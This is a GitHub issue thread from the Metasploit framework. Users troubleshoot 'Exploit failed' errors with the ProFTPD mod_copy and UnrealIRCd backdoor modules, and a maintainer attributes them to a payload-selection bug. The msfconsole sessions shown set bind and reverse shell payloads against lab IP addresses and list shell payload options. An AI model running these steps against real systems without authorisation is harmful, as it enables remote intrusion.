Metasploit-framework: Exploit failed: An exploitation error occurred.

Created on 30 Jun 2020  路  16Comments  路  Source: rapid7/metasploit-framework

Using a fresh install of kali linux and metasploit v5.0.96-dev-

No matter what exploit module I try and use I get the error Exploit failed: An exploitation error occurred.

An example below but I get the same result trying to use any exploit.

`msf5 exploit(unix/ftp/proftpd_modcopy_exec) > options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.203 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host

Exploit target:

Id Name

0 ProFTPD 1.3.5

msf5 exploit(unix/ftp/proftpd_modcopy_exec) > run

[-] 192.168.1.203:80 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/proftpd_modcopy_exec) >`

question
Source
picture Jase-NZ

All 16 comments

There's currently a bug with the way payloads are automatically selected.

Try manually settings a payload with set payload ...

bcoles picture bcoles on 30 Jun 2020

Ahhh thanks for that I thought I was going crazy lol.

Jase-NZ picture Jase-NZ on 30 Jun 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

To whichever payload you want to use. You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>

bcoles picture bcoles on 1 Aug 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

To whichever payload you want to use. You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>
I am using this exploit : exploit/unix/irc/unreal_ircd_3281_backdoor
but the tutorial I am watching doesn't say anything about which payload to use,
I googled and it says to use : set PAYLOADS cmd/unix/bind_netcat
but still the output says :[-] 172.17.0.2:6667 - Exploit failed: An exploitation error occurred. [*] Exploit completed, but no session was created.

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

To whichever payload you want to use. You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>
I am using this exploit : exploit/unix/irc/unreal_ircd_3281_backdoor
but the tutorial I am watching doesn't say anything about which payload to use,
I googled and it says to use :set PAYLOADS cmd/unix/bind_netcat
but still the output says :[-] 172.17.0.2:6667 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.

You used set PAYLOADS no set payload.

Also, you should update your Metasploit to the latest version.

bcoles picture bcoles on 1 Aug 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

To whichever payload you want to use. You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>
I am using this exploit : exploit/unix/irc/unreal_ircd_3281_backdoor
but the tutorial I am watching doesn't say anything about which payload to use,
I googled and it says to use :set PAYLOADS cmd/unix/bind_netcat
but still the output says :[-] 172.17.0.2:6667 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.

You used set PAYLOADS no set payload.

Also, you should update your Metasploit to the latest version.
Terminal output:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_netcat [-] The value specified for payload is not valid.
I am using metasploit v5.0.102 ,I believe its the latest.

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

Ahhh thanks for that I thought I was going crazy lol.

set payload (to what?)

To whichever payload you want to use. You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>
I am using this exploit : exploit/unix/irc/unreal_ircd_3281_backdoor
but the tutorial I am watching doesn't say anything about which payload to use,
I googled and it says to use :set PAYLOADS cmd/unix/bind_netcat
but still the output says :[-] 172.17.0.2:6667 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.

You used set PAYLOADS no set payload.
Also, you should update your Metasploit to the latest version.
Terminal output:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_netcat [-] The value specified for payload is not valid.
I am using metasploit v5.0.102 ,I believe its the latest.

The payload you have chosen is not compatible with the module.

You can list payloads with show payloads. msfconsole also features tab completion, simply type set payload <tab><tab>.

bcoles picture bcoles on 1 Aug 2020

Which one should I use how would I decide ?
# Name Disclosure Date Rank Check Description

  • ---- --------------- ---- ----- -----------
    0 cmd/unix/bind_perl manual No Unix Command Shell, Bind TCP (via Perl)
    1 cmd/unix/bind_perl_ipv6 manual No Unix Command Shell, Bind TCP (via perl) IPv6
    2 cmd/unix/bind_ruby manual No Unix Command Shell, Bind TCP (via Ruby)
    3 cmd/unix/bind_ruby_ipv6 manual No Unix Command Shell, Bind TCP (via Ruby) IPv6
    4 cmd/unix/generic manual No Unix Command, Generic Command Execution
    5 cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
    6 cmd/unix/reverse_bash_telnet_ssl manual No Unix Command Shell, Reverse TCP SSL (telnet)
    7 cmd/unix/reverse_perl manual No Unix Command Shell, Reverse TCP (via Perl)
    8 cmd/unix/reverse_perl_ssl manual No Unix Command Shell, Reverse TCP SSL (via perl)
    9 cmd/unix/reverse_ruby manual No Unix Command Shell, Reverse TCP (via Ruby)
    10 cmd/unix/reverse_ruby_ssl manual No Unix Command Shell, Reverse TCP SSL (via Ruby)
    11 cmd/unix/reverse_ssl_double_telnet manual No Unix Command Shell, Double Reverse TCP SSL (telnet)
recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

@recherche-shafeeq It looks like you're struggling with Metasploit fundamentals.

The Metasploit issue tracker is for tracking issues with Metasploit.

Perhaps someone on IRC or Slack can help you out with your questions:

bcoles picture bcoles on 1 Aug 2020
👍1

@recherche-shafeeq It looks like you're struggling with Metasploit fundamentals.

The Metasploit issue tracker is for tracking issues with Metasploit.

Perhaps someone on IRC or Slack can help you out with your questions:

could u share some tutorials/website ...(pentesting)

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

could u share some tutorials/website ...(protesting)

You can start with the wiki and documentation.

Metasploit Unleashed is a bit outdated but a good resource.

The Metasploit issue tracker is for tracking issues with Metasploit.

Perhaps someone on IRC or Slack can help you out with your questions:

bcoles picture bcoles on 1 Aug 2020

could u share some tutorials/website ...(protesting)

You can start with the wiki and documentation.

Metasploit Unleashed is a bit outdated but a good resource.

The Metasploit issue tracker is for tracking issues with Metasploit.

Perhaps someone on IRC or Slack can help you out with your questions:

If it(metasploit) is outdated then what are some of the newer tools I could use to get up to speed with pentesting.

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

could u share some tutorials/website ...(protesting)

You can start with the wiki and documentation.
Metasploit Unleashed is a bit outdated but a good resource.
The Metasploit issue tracker is for tracking issues with Metasploit.
Perhaps someone on IRC or Slack can help you out with your questions:

If it(metasploit) is outdated then what are some of the newer tools I could use to get up to speed with pentesting.

Perhaps someone on IRC or Slack can help you out with your questions:

bcoles picture bcoles on 1 Aug 2020
👍1

could u share some tutorials/website ...(protesting)

You can start with the wiki and documentation.
Metasploit Unleashed is a bit outdated but a good resource.
The Metasploit issue tracker is for tracking issues with Metasploit.
Perhaps someone on IRC or Slack can help you out with your questions:

If it(metasploit) is outdated then what are some of the newer tools I could use to get up to speed with pentesting.

Perhaps someone on IRC or Slack can help you out with your questions:

thanks

recherche-shafeeq picture recherche-shafeeq on 1 Aug 2020

msf5 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/ftp/proftpd_modcopy_exec) > run

[] Started reverse TCP handler on 192.168.1.240:4444
[] 192.168.1.237:80 - 192.168.1.237:21 - Connected to FTP server
[] 192.168.1.237:80 - 192.168.1.237:21 - Sending copy commands to FTP server
[] 192.168.1.237:80 - Executing PHP payload /test/jXLezE.php
[-] 192.168.1.237:80 - Exploit aborted due to failure: unknown: 192.168.1.237:21 - Failure executing payload
[*] Exploit completed, but no session was created.

I was stucked at this error, can anyone help me pls

misuka123 picture misuka123 on 4 Dec 2020
Was this page helpful?
0 / 5 - 0 ratings

Related issues

miholtz picture miholtz  路  3Comments
notdodo picture notdodo  路  3Comments
BaconBombz picture BaconBombz  路  3Comments
XSecr3t picture XSecr3t  路  3Comments
bugshere picture bugshere  路  3Comments